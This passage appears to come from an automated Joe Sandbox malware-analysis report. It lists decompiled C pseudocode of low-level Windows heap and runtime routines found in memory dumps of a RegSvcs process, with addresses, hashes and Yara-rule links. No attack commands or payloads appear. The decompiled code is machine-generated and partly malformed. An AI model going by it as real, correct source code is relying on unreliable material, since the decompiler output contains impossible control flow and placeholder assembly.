							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x13e8724; // 0x0
					return E013A8DF1(__ebx, 0xc0000374, 0x13e5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                          0x013b2076
                                          0x013b2078
                                          0x013b207d
                                          0x013b2083
                                          0x013b20a4
                                          0x013b20aa
                                          0x013b20ac
                                          0x013b20b7
                                          0x013b20ba
                                          0x013b20bc
                                          0x013b20c9
                                          0x013b20c9
                                          0x013b20d0
                                          0x013b20d2
                                          0x00000000
                                          0x013b20d2
                                          0x013b20be
                                          0x013b20c3
                                          0x013b20c5
                                          0x013b20c7
                                          0x00000000
                                          0x00000000
                                          0x013b20c7
                                          0x013b20bc
                                          0x013b20d4
                                          0x013b2085
                                          0x013b2085
                                          0x013b20a3
                                          0x013b20a3

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0437db535b102733fe681860ad09ae137ba26529a0930103ee92ddf04c942f5a
                                          • Instruction ID: 89d7150ced9afa024e957833e8b51219768383796dd07ac6c0469a183f688eec
                                          • Opcode Fuzzy Hash: 0437db535b102733fe681860ad09ae137ba26529a0930103ee92ddf04c942f5a
                                          • Instruction Fuzzy Hash: FBF0557A8152868ADF336B2C35903E33FCAD75525CF0A01C5DA902BA49D5349883CB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0133927A Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E0133927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0133FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E013392C6(_t11, _t14);
				}
				return _t11;
			}





                                          0x01339295
                                          0x01339299
                                          0x0133929f
                                          0x013392aa
                                          0x013392ad
                                          0x013392ae
                                          0x013392af
                                          0x013392b0
                                          0x013392b4
                                          0x013392bb
                                          0x013392bb
                                          0x013392c5

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction ID: 84a9a79dbb16f83d38e3048ba4dd1057e2cad6e1dd21b8c4ebd55ae52cc22841
                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction Fuzzy Hash: 70E02B323409016BE7119E0DCC80F03375DDFD2728F004078B5005E242C6E6DC098BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C8D34 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 43%
                                          			E013C8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x13ed360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01317D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0133B640(E01339AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                          0x013c8d34
                                          0x013c8d43
                                          0x013c8d4b
                                          0x013c8d4e
                                          0x013c8d52
                                          0x013c8d5c
                                          0x013c8d6e
                                          0x013c8d5e
                                          0x013c8d67
                                          0x013c8d67
                                          0x013c8d79
                                          0x013c8d7a
                                          0x013c8d7c
                                          0x013c8d81
                                          0x013c8d94

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9f7316e4f44f8ff948eec3f7cf87f62668a36e5b2625f011565fa6c01ed0df78
                                          • Instruction ID: f8726831983b26d3e16aa078126f737156f39d287d69d64f5c0dd6e7b18d4ff1
                                          • Opcode Fuzzy Hash: 9f7316e4f44f8ff948eec3f7cf87f62668a36e5b2625f011565fa6c01ed0df78
                                          • Instruction Fuzzy Hash: 90F0BE70E0460DAFDB14EFB8D445B6EB7B8EF58704F508099E905EB291EA34DA00CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C8B58 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 36%
                                          			E013C8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x13ed360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E01317D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0133B640(E01339AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                          0x013c8b67
                                          0x013c8b6f
                                          0x013c8b72
                                          0x013c8b7d
                                          0x013c8b8f
                                          0x013c8b7f
                                          0x013c8b88
                                          0x013c8b88
                                          0x013c8b9a
                                          0x013c8b9b
                                          0x013c8b9d
                                          0x013c8ba2
                                          0x013c8bb5

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 87bbc3203b58910c7c656878453ba0e7d8070eb6e9a8bb0e491fc99e78d511e3
                                          • Instruction ID: 6cdf9b88030cd98fe6023da6ffca6e8cd7da478d17b48a42b6d03beb47d21d66
                                          • Opcode Fuzzy Hash: 87bbc3203b58910c7c656878453ba0e7d8070eb6e9a8bb0e491fc99e78d511e3
                                          • Instruction Fuzzy Hash: C5F082B1A0425DAFDB14EBA8D906E6EB7B8EF44708F440499BA05DB3D1EA74D900C798
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0131746D Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E0131746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0130EB70(__ecx, 0x13e79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E013395D0();
							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                          0x0131746d
                                          0x0131746d
                                          0x0131746d
                                          0x01317471
                                          0x01317488
                                          0x0135f92d
                                          0x0131748e
                                          0x01317491
                                          0x01317495
                                          0x0135f937
                                          0x0135f93a
                                          0x0135f94e
                                          0x0135f953
                                          0x0135f956
                                          0x0135f956
                                          0x01317495
                                          0x00000000
                                          0x01317488
                                          0x01317473
                                          0x01317478
                                          0x0131747d
                                          0x01317481
                                          0x00000000
                                          0x01317481
                                          0x0131747d
                                          0x0131747a
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c6bd6d6dd36f249da933419eeed9c6b118d213a5d15307ee83fca362c7aa7dc
                                          • Instruction ID: 11590734405d9a4c4172c898749411e0a33f76177aa38ebba12953a03145a3ed
                                          • Opcode Fuzzy Hash: 1c6bd6d6dd36f249da933419eeed9c6b118d213a5d15307ee83fca362c7aa7dc
                                          • Instruction Fuzzy Hash: 6FF05934580149EADF0A97ACC440FFA7FB5AF0031CF0C0115D851B7199EB24C800C785
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C8CD6 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 36%
                                          			E013C8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x13ed360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E01317D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0133B640(E01339AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                          0x013c8ce5
                                          0x013c8ced
                                          0x013c8cf0
                                          0x013c8cfb
                                          0x013c8d0d
                                          0x013c8cfd
                                          0x013c8d06
                                          0x013c8d06
                                          0x013c8d18
                                          0x013c8d19
                                          0x013c8d1b
                                          0x013c8d20
                                          0x013c8d33

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd891a18b68af3c43cc002935b7894e041cd7109bcc9391c5343c85bbd6b5191
                                          • Instruction ID: 7fa875d196a249f46f8123158b3d6786270492e3ff4c6a87b80e27a2610cda33
                                          • Opcode Fuzzy Hash: bd891a18b68af3c43cc002935b7894e041cd7109bcc9391c5343c85bbd6b5191
                                          • Instruction Fuzzy Hash: CCF0E270A0420DAFDB04DBACD845E6E77B8EF58308F100199E912EB2C0EA34DD00C758
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012F4F2E Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E012F4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E013C88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0131C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x12d1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                          0x012f4f2e
                                          0x012f4f34
                                          0x012f4f38
                                          0x01350b85
                                          0x01350b85
                                          0x01350b89
                                          0x01350b9a
                                          0x01350b9a
                                          0x01350b9f
                                          0x00000000
                                          0x01350b9f
                                          0x01350b94
                                          0x01350b98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01350b98
                                          0x012f4f3e
                                          0x012f4f48
                                          0x00000000
                                          0x012f4f6e
                                          0x00000000
                                          0x012f4f70

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 99197e53812ec4ff879c222250a5769ac515776053715d8e1ffa584b809d14c0
                                          • Instruction ID: 68bac11666663d8df965c114339d57edb99bf4eea15e0fc75fd3c850387cad2c
                                          • Opcode Fuzzy Hash: 99197e53812ec4ff879c222250a5769ac515776053715d8e1ffa584b809d14c0
                                          • Instruction Fuzzy Hash: 67F0BE329256848FD7A6DB1CC5D4F22BBE4AF00B7CF045464E84587922C765ED40C640
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132A44B Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0132A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x13e7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0133FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                          0x0132a44b
                                          0x0132a453
                                          0x0132a472
                                          0x0132a476
                                          0x00000000
                                          0x0132a493
                                          0x0132a47a
                                          0x0132a47f
                                          0x0132a486
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c89a834f9b40b63b94b8b388a4c9f7a77e8d41fea3051947b4884dc57fe0df2
                                          • Instruction ID: a1a2bef52cc7fbd6d86ef0140b2d0c4657bd2306372632db315d5e91eea7a18e
                                          • Opcode Fuzzy Hash: 4c89a834f9b40b63b94b8b388a4c9f7a77e8d41fea3051947b4884dc57fe0df2
                                          • Instruction Fuzzy Hash: EBE09272A05422ABD2215A18AC00F66739DDBE4659F094435E604D7754D628DD02C7E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012FF358 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E012FF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0132F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L01314620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                          0x012ff35d
                                          0x012ff361
                                          0x012ff367
                                          0x012ff372
                                          0x012ff38c
                                          0x012ff38c
                                          0x012ff394

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction ID: fa1d40c9c5c0405f7f66ebabf718f3c4ba1ee1b6a73384847f60f3d0784f84f5
                                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction Fuzzy Hash: FDE09A33A40128BBDB21AA9D9E05FAABAADDB58A60F0001A9BB04D7150D5749E00C2D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0130FF60 Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0130FF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x12d11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E013C88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E01310050(_t14);
				}
			}










                                          0x0130ff66
                                          0x0130ff6b
                                          0x00000000
                                          0x0130ff8f
                                          0x00000000
                                          0x0130ff8f

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b9499470da7abf87532a3bc136d7a3ef7b1e112ba493cd12620ce97447f4feda
                                          • Instruction ID: aa9055d8804e74076b84eb8d974241655e0a4745cfe8142bdaeac3e0f5924b29
                                          • Opcode Fuzzy Hash: b9499470da7abf87532a3bc136d7a3ef7b1e112ba493cd12620ce97447f4feda
                                          • Instruction Fuzzy Hash: 07E0DFB020D2049FD73BDB69D060F253BDC9B52629F19805DF0084B982C661D885C296
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013841E8 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E013841E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x13d08f0);
				_t5 = E0134D08C(__ebx, __edi, __esi);
				if( *0x13e87ec == 0) {
					E0130EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x13e87ec == 0) {
						 *0x13e87f0 = 0x13e87ec;
						 *0x13e87ec = 0x13e87ec;
						 *0x13e87e8 = 0x13e87e4;
						 *0x13e87e4 = 0x13e87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01384248();
				}
				return E0134D0D1(_t5);
			}





                                          0x013841e8
                                          0x013841ea
                                          0x013841ef
                                          0x013841fb
                                          0x01384206
                                          0x0138420b
                                          0x01384216
                                          0x0138421d
                                          0x01384222
                                          0x0138422c
                                          0x01384231
                                          0x01384231
                                          0x01384236
                                          0x0138423d
                                          0x0138423d
                                          0x01384247

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 47e5616e91e558a3048e9e72370fb5ad97dfab29d8bfd9e8eb51125623f9a890
                                          • Instruction ID: 73b1f1c6c1bb9cdae4da7204466b5583c8e74ed31800f154fb07a0fc8702cd80
                                          • Opcode Fuzzy Hash: 47e5616e91e558a3048e9e72370fb5ad97dfab29d8bfd9e8eb51125623f9a890
                                          • Instruction Fuzzy Hash: 0FF01578D90702CFCBB1EFA9A50470836E8FB54318F0041AED0048B6C8D73455A4CF01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013AD380 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E013AD380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L012FE8B0(__ecx, _a4, 0xfff);
					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                          0x013ad38a
                                          0x013ad39b
                                          0x013ad3b1
                                          0x00000000
                                          0x013ad3b6
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction ID: 05394713e99009b203bccda1ff4193cece91fa05253e68d23190d611b639cf49
                                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction Fuzzy Hash: 61E0C231280209BBDB236E88CC00FB9BB1ADB507A4F114031FE085ABE0C6719C91D6C4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0132A185 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0132A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x13e67e4 >= 0xa) {
					if(_t5 < 0x13e6800 || _t5 >= 0x13e6900) {
						return L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E01310010(0x13e67e0, _t5);
				}
			}





                                          0x0132a190
                                          0x0132a1a6
                                          0x0132a1c2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0132a192
                                          0x0132a192
                                          0x0132a19f
                                          0x0132a19f

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d03126657633e77c8319f6fa4708c7d312fe5ee5f731b34f0f34d1411453ad17
                                          • Instruction ID: b04ff44226cf1bcb695b8482414ab01038957b8a7dcf52be816f4aa1840a4833
                                          • Opcode Fuzzy Hash: d03126657633e77c8319f6fa4708c7d312fe5ee5f731b34f0f34d1411453ad17
                                          • Instruction Fuzzy Hash: 00D02BF117022017C72D73048819B253693F7A477CF34080CF2034BDD4E960D8D8C108
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013216E0 Relevance: .0, Instructions: 17COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E013216E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E01321710(0x13e67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L01314620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                          0x013216e8
                                          0x013216ef
                                          0x013216f3
                                          0x013216fe
                                          0x00000000
                                          0x01321700
                                          0x0132170d
                                          0x0132170d
                                          0x013216f2
                                          0x013216f2
                                          0x013216f2
                                          0x013216f2

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed355bd228ef19d68b14b909fd3968f8b4d9d15863124bc66b14c04e9239be3c
                                          • Instruction ID: 4de589ebbabb640f54fb4640e42ae9256b3109ebe10097197d0c75063c96e957
                                          • Opcode Fuzzy Hash: ed355bd228ef19d68b14b909fd3968f8b4d9d15863124bc66b14c04e9239be3c
                                          • Instruction Fuzzy Hash: 6CD0A77114021192EA3D6B1C9904B193652EBD0BADF38005CF607594C0CFA4CC92E048
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013753CA Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E013753CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E0130EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                          0x013753ca
                                          0x013753ce
                                          0x013753d9
                                          0x013753de
                                          0x013753e1
                                          0x013753e1
                                          0x013753e6
                                          0x013753f3
                                          0x00000000
                                          0x013753f8
                                          0x013753fb

                                          Memory Dump Source
